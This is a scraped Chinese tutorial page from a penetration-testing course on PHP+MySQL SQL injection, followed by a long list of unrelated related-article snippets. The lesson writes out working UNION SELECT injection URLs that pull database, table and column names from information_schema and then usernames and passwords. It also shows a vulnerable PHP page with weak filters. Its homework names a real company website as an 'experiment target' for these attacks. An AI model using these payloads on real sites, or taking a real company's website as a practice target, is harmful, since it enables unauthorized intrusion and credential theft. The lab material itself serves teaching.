仲夏199603
仲夏199603

小迪教程第四天——Php+mysql注入

Access注入属于暴力猜解
Mysql5.0以上注入属于有根据的(information_schema数据库)
Mysql5.0以下注入属于暴力猜解

Access数据结构

Access数据库
表名
列名
数据

Mysql数据结构

Mysql数据库
a数据库
表名
列名
数据
b数据库
表名
列名
数据

手写测试注入页面(php+mysql)

思路步骤:
准备工作:mysql数据库中新建数据(导入数据库并执行)
1.连接mysql数据库
2.设置接受参数并组合sql语句
3.执行sql语句并处理结果

Mysql5.0以上注入获取帐号密码
1.获取当前使用的数据库名
http://192.168.207.128/sqlin.php?id=5 UNION SELECT database(),2,3,4,5

2.获取数据库名下的表名
http://192.168.207.128/sqlin.php?id=5 UNION SELECT table_name,2,3,4,5 from
information_schema.tables where table_schema=0x73716C696E

3.获取对应表名下的列名
http://192.168.207.128/sqlin.php?id=5 UNION SELECT column_name,2,3,4,5 from
information_schema.columns where table_name=0x75736572

4.获取内容数据
http://192.168.207.128/sqlin.php?id=5 UNION SELECT username,password,3,4,5 from user

查询函数:
Database():数据库名 sqlin
User():数据库用户 root
Version():数据库版本 5.5.40
@@version_compile_os:操作系统 win32

Information_schema数据库:mysql5.0以上版本自带的数据库,它是存储mysql数据库下的所有数据库下的表名及列名信息的数据库。

information_schema.tables:information_schema数据库下的tables表名(存储表名信息的表)
table_schema:数据库名
Table_name:表名
Column_name:列名
information_schema.columns:information_schema数据库下的columns列名(存储列名信息的表)

防注入的实现

1.针对关键字过滤(正则表达式)
2.判断传参类型(类型函数)
3.行为进行判断



$conn = mysql_connect("127.0.0.1","root","root");//连接mysql数据库并将返回结果赋值给变量conn
//接受参数名为id的值并赋值给变量x
//1.针对关键字过滤(正则表达式)
//$x = str_replace("union","x",$_GET['id']);
//2.判断传参类型(类型函数)
$x = $_GET['id'];
if(is_numeric($x)){
    mysql_select_db("sqlin",$conn);//选择连接请求为conn下的fanke数据库
    $sql="select * from user where id=$x";
    $result = mysql_query($sql);//执行变量sql的语句并将返回结果赋值给变量result
//数组遍历结果选择显示
    while($row = mysql_fetch_array($result)){
        echo "用户ID:".$row['id']."
";
        echo "用户名:".$row['username']."
";
        echo "用户密码:".$row['password']."
";
    }

    mysql_close($conn);
    echo '
';
    echo $sql;
}
else{
    echo "防注入程序";
}



?>

作业:
1.搭建环境,手写注入页面,尝试防注入实现并绕过
2.完成实验目标:
http://www.microtek.com.cn/
(1.没有数字显示 2.表列名显示不全)

你可能感兴趣的:(渗透测试)

  • 网络安全第14集 不灭锦鲤 web安全安全
    前言:小迪安全14集,这集重点内容:0、什么是js渗透测试?在javascript中也存在变量和函数,存在可控变量和函数就有可能存在在漏洞,js开发的web应用和php、java开发的区别是,js能看得到的源代码,php看不到,但是风险就是未授权访问、配置信息泄露(加密算法、key秘钥等),源代码看得到,存在更多的url泄露,从而可能会出现未授权访问,从url,前提:web应用可以采用前端语言或后
  • 代码审计与web安全选择题1 m0_74726609 代码审计网络安全
    软件供应链安全的基础是()A.完善的需求分析B.源代码安全C.渗透测试D.软件测试参考答案:B保证源代码安全的主要措施包括()A.开发工具和环境的安全B.代码安全C.渗透测试D.代码审计E.软件的说明文档完整参考答案:ABCD通过()技术,实现源代码在终端、网络及服务器存储场景下全周期的安全管理,防止内部代码有意、无意泄露、扩散出去。A.数据加B.数据脱C.数据安全隔离D.防火墙参考答案:C软件供
  • 网站渗透测试完全手册:零基础到进阶,系统学习网络安全攻防
    渗透测试介绍渗透测试就是模拟攻击者入侵系统,对系统进行一步步地渗透,发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固,提升系统的安全性,防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试,就是违法行为!渗透测试意义信息安全评估的重要方法,有利于掌握系统整体安全强度。模拟黑客攻击和思维,评估计算机潜在风险。发
  • 【网络安全】Metasploit 生成的 Shellcode 的导入函数解析以及执行流程分析(1) IT老涵 程序员安全网络网络安全信息安全计算机网络
    2021年4月,研究人员深入分析了CobaltStrike渗透测试技术,以及它的一些签名规避技术是如何在检测技术下失效的。在本文中,我们将深入讨论Metasploit,这是一个可以与CobaltStrike互操作的常用框架。在本文中,我们将讨论以下主题:shellcode的导入解析——Metasploitshellcode如何定位来自其他DLL的函数,以及我们如何预先计算这些值来解析来自其他有效载
  • 从零起步:30岁转行网络安全的实战指南 程序员罗知知 web安全网络安全sql数据库apache零基础
    从零起步:30岁转行网络安全的实战指南当你决定在30岁转行进入网络安全领域,那感觉就像突然跳进了深不见底的大海,既兴奋又有点怕水。但别担心,这条路上并不孤单。下面,咱就聊聊怎么一步步走向成功。转型之初的迷茫与方向认清自我是第一步。得知道自己到底对哪块感兴趣,是想搞渗透测试,还是更喜欢安全开发?比如我对Linux和编程特别着迷,于是选择了渗透测试作为切入点。接着就是学习资源的选择。网络上信息多得让人
  • #渗透测试#网络安全#一文了解什么是中间件!!! 独行soc 一文了解网络安全web安全网络安全漏洞挖掘面试中间件架构
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、什么是中间件中间件的定义中间件的功能中间件的分类二、中间件技术的发展趋势三、中间件在云上的应用四、云中间件高可用性实现方法五、云中间件集群管理最佳实践六、云中间件性能监控指标详解七、提
  • 阿里云代理商:SSL篡改检测5步法——确保网站通信安全 v_junsouyun06 阿里云代理商阿里云优惠券阿里云服务器https安全网络协议
    目录一、什么是SSL篡改?二、SSL篡改检测5步法步骤1:检查SSL证书的合法性和完整性如何检查:工具推荐:步骤2:检查HTTPS连接的加密强度如何检查:工具推荐:步骤3:监控HTTP头和响应内容如何检查:工具推荐:步骤4:定期进行SSL证书的在线监控如何监控:工具推荐:步骤5:进行SSL漏洞扫描和渗透测试如何进行:工具推荐:三、总结在现代互联网环境中,SSL/TLS协议已成为确保网站与用户之间安
  • 网络安全漏洞挖掘入门教程(非常详细),从入门到精通,收藏这一篇就够了 前字节网络安全工程师 网络安全web安全安全
    一、什么是网络安全漏洞挖掘?1、简单介绍漏洞挖掘网络安全漏洞挖掘的全称为安全漏洞探测,简称漏洞挖掘,别称有白帽测试、渗透测试等。网络安全漏洞挖掘是一种主动查找系统、应用或网络弱点的过程,目的是在恶意攻击者之前发现和修复漏洞,保障数据安全。安全团队通过漏洞挖掘技术,对目标进行系统性扫描和分析,识别出如注入攻击、缓冲区溢出等隐患,并提供修补方案。如果形象地理解,漏洞挖掘就如同一个数字侦探,它的核心任务
  • 黑客必备的漏洞挖掘技术流程指南,零基础入门到精通,收藏这一篇就够了 灵魂黑客向阳 网络安全web安全学习安全
    一、什么是网络安全漏洞挖掘?1、简单介绍漏洞挖掘网络安全漏洞挖掘的全称为安全漏洞探测,简称漏洞挖掘,别称有白帽测试、渗透测试等。网络安全漏洞挖掘是一种主动查找系统、应用或网络弱点的过程,目的是在恶意攻击者之前发现和修复漏洞,保障数据安全。安全团队通过漏洞挖掘技术,对目标进行系统性扫描和分析,识别出如注入攻击、缓冲区溢出等隐患,并提供修补方案。如果形象地理解,漏洞挖掘就如同一个数字侦探,它的核心任务
  • 全面网络安全渗透测试流程[也称之为打点(站点)]与防护策略 浩策 OWASPTop漏洞web渗透web安全安全网络安全系统安全密码学安全架构网络攻击模型
    目录️‍♂️一、信息收集1.1获取域名和注册信息1.2收集子域名和旁站信息1.3DNS信息收集1.4识别服务器中间件和操作系统1.5扫描目录结构与敏感文件1.6敏感信息泄露1.7指纹识别二、漏洞扫描2.1Web漏洞扫描2.2系统漏洞扫描2.3漏洞验证⚔️三、漏洞利用与权限提升3.1漏洞利用3.2权限提升3.3权限维持四、内网渗透与痕迹清理4.1内网渗透4.2痕迹清理总结渗透测试是网络安全领域中至关
  • 一篇文章带你完全入门网络安全行业 网络安全架构师月月 网络安全web安全网络安全
    什么是网络安全网络安全兴起于1990年代中后期,伴随互联网发展迅速走向成熟。近二十年来,网络安全在金融、政企、医疗、电商等关键行业构建起完整生态,催生了多种高需职业方向,如渗透测试、应急响应、风险评估、安全防御架构设计等,已成为当前人才缺口最大领域之一。除了以上这些,大部分人学网络安全也是为了兼职赚钱,比如通过漏洞挖掘与渗透测试为企业排查安全隐患,构建自动化威胁防御策略实时保护系统免受攻击,开展红
  • 网络安全自学入门:(超详细)从入门到精通学习路线&;规划,学完即可就业 2401_84264010 程序员web安全学习安全
    4.遇到实在搞不懂的,可以先放放,以后再来解决网络安全零基础入门学习路线&规划初级1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理
  • 小白入门网安必学的11种渗透工具 baimao__沧海 web安全安全渗透工具小白必学的渗透工具
    11种渗透测试工具,非常适合检测漏洞并准确模拟网络攻击。让我们看一下它们的功能和兼容的平台。您是否一直在寻找最能满足您的Web应用程序和网络安全测试要求的渗透测试工具?您是否要比较和分析不同的渗透测试工具,并确定最适合您企业的工具?还是只是想知道那里有哪些工具以及它们的功能?如果是,那么此博客已覆盖您。无论是为了进行法规遵从性,安全性评估而进行笔试测试,还是为了增强IT环境对网络安全威胁的防御能力
  • 网络安全渗透师的发展前景为什么这么好呢? 程序员小雨Y web安全安全tcp/ip网络协议网络php30岁转行
    网络安全渗透工程师网络安全渗透工程师,实际上它是网络安全大方向下网络安全应急与防御的一个细分岗位,属于网络安全行业。Part.01网络安全渗透工程师的发展前景渗透工程师前景非常好,网络安全发展规模不断扩大,未来行业类的人才需求也会越来越多。就目前看来在网络安全方向上就业的薪资待遇也十分可观。(1)时代浪潮下,渗透测试的职业发展前景巨大。一个企业,想要安全、无后顾之忧的发展,网络安全保障是必不可少的
  • 红队视角:实战渗透测试中漏洞利用的进阶技巧与防御 白山云北诗 网络安全行业知识网络安全攻防演练渗透测试漏洞扫描
    红队作为渗透测试的“攻击方”,其核心价值不仅在于发现漏洞,更在于挖掘漏洞的深度利用方式——通过绕过防护措施、组合低危漏洞形成攻击链,暴露企业真实安全风险。从红队视角解析漏洞利用的进阶技巧,既能帮助防御方理解攻击思路,也能针对性优化防护策略。一、突破常规防护的漏洞利用进阶技巧红队在实战中常遇到WAF拦截、输入过滤、权限限制等防护措施,需通过进阶技巧突破防线:逻辑漏洞的深度挖掘与利用常规漏洞扫描工具难
  • 渗透测试实战:从入门到精通的全方位指南
    在数字化时代,网络安全已成为企业运营和个人生活的重要防线。渗透测试,作为评估系统安全性的重要手段,通过模拟黑客攻击,发现并利用系统中的漏洞,为安全防护提供有力支持。本文将为您提供一份从入门到精通的渗透测试实战指南,帮助您全面了解并掌握这一技能。一、渗透测试基础1.渗透测试定义渗透测试是指试图利用系统、网络、人力资源或实物资产中的弱点或漏洞,以对安全控制的有效性进行压力测试。它旨在发现潜在的安全风险
  • 网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程
    目录一、案例背景二、目标分析(信息收集阶段)外部信息搜集指纹识别和端口扫描三、攻击流程(渗透测试全过程)步骤1:Web漏洞利用——泛微OA远程命令执行漏洞(CVE-2023-2648)步骤2:权限维持与横向移动2.1获取本地密码信息2.2利用数据库读取其他管理员账号密码(Base64加密)2.3横向移动尝试:步骤3:提权(本地提权)漏洞利用:CVE-2016-0099(WindowsKernel提
  • 常见的漏洞利用框架整理 网安导师小李 编程网络安全程序员node.jsweb安全网络安全tomcatpythonjava
    一、常见的漏洞利用框架MetasploitFramework:一个广泛使用的开源漏洞利用框架,用于测试和评估系统的安全性。ExploitDB:一个在线漏洞利用数据库,包含各种漏洞的利用代码。Canvas:由Immunity开发的商业漏洞利用框架,提供高级的漏洞利用技术和功能,用于渗透测试和漏洞研究。CoreImpact:一款商业漏洞利用框架,用于对网络和应用程序进行安全评估和渗透测试。Cobalt
  • 为任意Java程序配置Socks5与HTTP代理的方法
    在红队渗透测试的内网横向移动过程中,搭建反向代理是常见操作。frp、NPS等工具可快速构建Socks5代理,方便红队人员在内网环境中进行渗透。然而,许多渗透工具由Java编写,且部分工具未内置Socks5代理支持。使用Proxifier为java.exe进程设置全局Socks5代理时总会出现各种各样的问题。本文将详细介绍如何通过Java命令行参数或代码方式为任意Java程序配置Socks5与HTT
  • 基于 Python 的网站信息探测工具设计与实现 计算机毕业设计指导 python网络服务器
    基于Python的网站信息探测工具设计与实现摘要在渗透测试与网络安全评估中,信息探测是最基础且关键的一步。通过对目标网站的操作系统、服务器、CMS、端口、目录结构等信息进行自动化探测,可为后续攻击路径识别提供基础数据支撑。传统工具如WhatWeb、FOFA等虽功能强大,但在定制化与扩展性方面受限。本文设计并实现了一款基于Python的轻量级网站信息探测工具,支持URL/IP扫描、开放端口探测、CM
  • vSphere开发指南1——vSphere Automation API H_00c8
    前言VMwarevCenterServer是VMware虚拟化管理平台,广泛的应用于企业私有云内网中。站在渗透测试工具开发的角度,我们需要通过命令行实现vCenterServer同虚拟机的交互。本系列文章将要比较多种不同的API,介绍实现细节,开源代码,实现以下功能:·读取虚拟机的配置·查看虚拟机文件·删除虚拟机文件·向虚拟机上传文件·从虚拟机下载文件·在虚拟机中执行命令简介本文将要介绍以下内容:
  • 转行网络安全门槛高吗?网络安全零基础入门到精通,收藏这篇就够了 leah126 网络安全安全
    在当前就业形势下,不少朋友面临转行的困境。网络安全作为一个热门领域,自然也吸引了许多人的目光。本文将就转行网络安全这一话题,提供一些切实可行的建议。网络安全行业概况网络安全涵盖了从基础的脚本编写到高级的漏洞研究等多个层面。该领域包括但不限于:渗透测试、漏洞评估、恶意软件分析、入侵检测、信息安全管理等。这些内容的复杂性不一,从基础的安全监控到复杂的安全架构设计都涉及其中。这就意味着,尽管有些领域可能
  • 漏洞扫描 + 渗透测试:双轮驱动筑牢网络安全防线 白山云北诗 网络安全行业知识web安全网络安全渗透测试漏洞扫描安全检测
    在网络安全领域,单一的防护手段往往难以应对复杂的威胁环境。漏洞扫描通过自动化工具快速发现潜在风险,渗透测试则以攻击者视角验证漏洞的实际危害,二者结合形成“自动化检测+人工验证”的双轮驱动模式,已成为企业筑牢安全防线的核心策略。一、漏洞扫描与渗透测试的协同价值漏洞扫描和渗透测试并非相互替代,而是互补的安全检测手段:漏洞扫描:自动化发现潜在风险漏洞扫描工具通过预设规则和特征库,对网络设备、服务器、应用
  • 渗透测试工程师(NISP-PT) 网安世纪小鹅NISP_CISP 网络网络安全安全
    第一阶段:网络安全基础知识(2周)【学生可掌握的核心能力】1、能够根据企业办公环境和信息点数,为企业组建中小型企业网络,并能指导实施;2、能够根据网络拓扑图,根据企业需求,配置路由器与交换机,实现企业网络全网互通;3、按照正确的操作方法和顺序,监控设备和网络的运行状态,维护设备和网络传输媒介的正常工作;完成设备的升级、配置文件的备份和还原等;完成网络的日常维护。【学习价值】具备市场网络中级水平,能
  • 渗透测试视角:Web 应用常见漏洞的利用与防御策略
    Web应用已成为企业业务的核心载体,但SQL注入、XSS、文件上传漏洞等安全问题频发。从渗透测试视角分析漏洞的利用原理,才能制定更有效的防御策略。本文将结合实战案例,解析Web应用常见漏洞的利用方式与防御方法。一、SQL注入漏洞:数据库的“隐形后门”SQL注入是最常见的Web漏洞之一,攻击者通过在参数中插入SQL语句,操控数据库获取数据或执行命令。漏洞原理与利用场景当Web应用未对用户输入进行过滤
  • 面试经验分享 | 成都某安全厂商渗透测试工程师
    更多大厂面试题看我的主页或者专栏找我免费领取目录:所面试的公司:某安全厂商所在城市:成都面试职位:渗透测试工程师岗位面试过程:面试官的问题:1.平常在学校打CTF嘛,获奖情况讲下,以及你自己的贡献如何?2.内网渗透主要思路说一下吧?3.web打点过程中有没有遇到过waf?怎么绕过的4.现在给你一个站你会怎么做信息搜集?5.如何快速检测定位网站目录下的webshell呢?6.简单讲下反弹shell的
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 43(题目+回答) 独行soc 2025年护网面试职场和发展linux科技渗透测试安全护网
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)431.自我介绍与职业规划2.Webshell源码级检测方案3.2025年新型Web漏洞TOP54.渗透中的高价值攻击点5.智能Fuzz平台架构设计6.堆栈溢出攻防演进7.插桩技术实战应用8.二进制安全能力矩阵9.C语言内存管理精要10.Pyth
  • 混合云工具沦为隐蔽的远程代码执行与权限提升载体 FreeBuf- flaskpython后端
    通过WAC执行命令时分配的令牌权限|图片来源:IBM混合云管理工具的安全隐患IBMX-Force团队近日对微软AzureArc进行深入研究,发现这款旨在统一本地与云环境的混合云管理工具,可能成为代码执行、权限提升和隐蔽驻留的潜在攻击载体。这项研究始于IBM红队在一次渗透测试中,偶然发现PowerShell脚本中硬编码的Azure服务主体(ServicePrincipal)密钥,进而触发对Azure
  • 2025年渗透测试面试题总结-字节跳动[实习]安全研究员(题目+回答) 独行soc 2025年渗透测试面试指南安全科技区块链linux职场和发展渗透测试网络安全
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字节跳动[实习]安全研究员1.你投的岗位是安全研究实习生,你了解我们这边主要是做什么的吗2.自我介绍3.现在有什么比较想做的方向吗?4.有没有审过开源框架、cms、中间件之类的?6.在A公司主要做什么的?7.入侵检测主要在做什么?遇到的问题?核心工作:典型问题:8.误报原
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 40(题目+回答)
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)401.SQL注入读写文件/二次注入/防御2.XSS类型及防御3.CSRF与XSS区别4.文件上传绕过与防御5.服务器解析漏洞6.XXE与SSRF7.RCE与PHP函数区别8.Python迭代器与装饰器9.缓冲区溢出原理/防御10.内网渗透经验1
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他